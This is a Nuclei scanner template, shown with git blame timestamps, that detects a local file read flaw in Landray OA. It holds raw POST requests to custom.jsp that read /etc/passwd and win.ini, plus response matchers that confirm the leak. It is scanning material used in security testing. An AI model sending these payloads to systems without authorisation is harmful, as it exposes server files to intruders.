nuclei-templates/vulnerabilities/other/landray-oa-fileread.yaml

39 lines
868 B
YAML
Raw Normal View History

2021-05-02 04:42:37 +00:00
id: landray-oa-fileread
info:
name: Landray-OA Fileread
author: pikpikcu
severity: high
2021-05-02 08:27:33 +00:00
reference: https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
2021-05-02 04:42:37 +00:00
tags: landray,lfi
requests:
2021-05-02 08:27:33 +00:00
- raw:
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
2021-05-02 08:28:47 +00:00
2021-05-02 08:27:33 +00:00
var={"body":{"file":"file:///etc/passwd"}}
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
2021-05-02 08:28:47 +00:00
2021-05-02 08:27:33 +00:00
var={"body":{"file":"file:///c://windows/win.ini"}}
2021-05-02 04:42:37 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-05-02 08:27:33 +00:00
- "for 16-bit app support"
condition: or
2021-05-02 04:42:37 +00:00
- type: status
status:
2021-05-02 08:27:33 +00:00
- 200